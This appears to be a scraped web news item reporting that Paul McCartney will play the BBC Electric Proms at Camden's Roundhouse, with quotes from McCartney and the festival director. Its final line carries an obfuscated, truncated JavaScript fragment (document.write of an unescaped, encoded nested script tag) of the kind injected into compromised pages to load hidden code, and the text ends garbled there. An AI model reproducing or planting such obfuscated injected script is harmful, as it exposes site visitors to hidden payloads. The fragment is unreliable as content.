The BBC has confirmed that Paul McCartney will be performing at this year's Electric Proms. McCartney will be playing at Camden's world famous Roundhouse on 25th October, the second night of the five day festival. Other artists already confirmed include Mark Ronson, The Kaiser Chiefs, Jamie Cullum and Sigur Ros.
Speaking about his plans for his performance McCartney said "I'm thinking of ideas as we speak – I probably won't know exactly what I'm going to do until the week before."
Festival Director Lorna Clarke added, "It is a real coup to have a true legend and one of the world's most creative artists performing for us at the festival. We are delighted that he has embraced the spirit of what the Electric Proms are all about – creating new moments in music – I can't wait to hear what he has come up with."
Highlights of Paul McCartney's performance will be shown on BBC Two with the full performance available to view at bbc.co.uk/electricproms.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
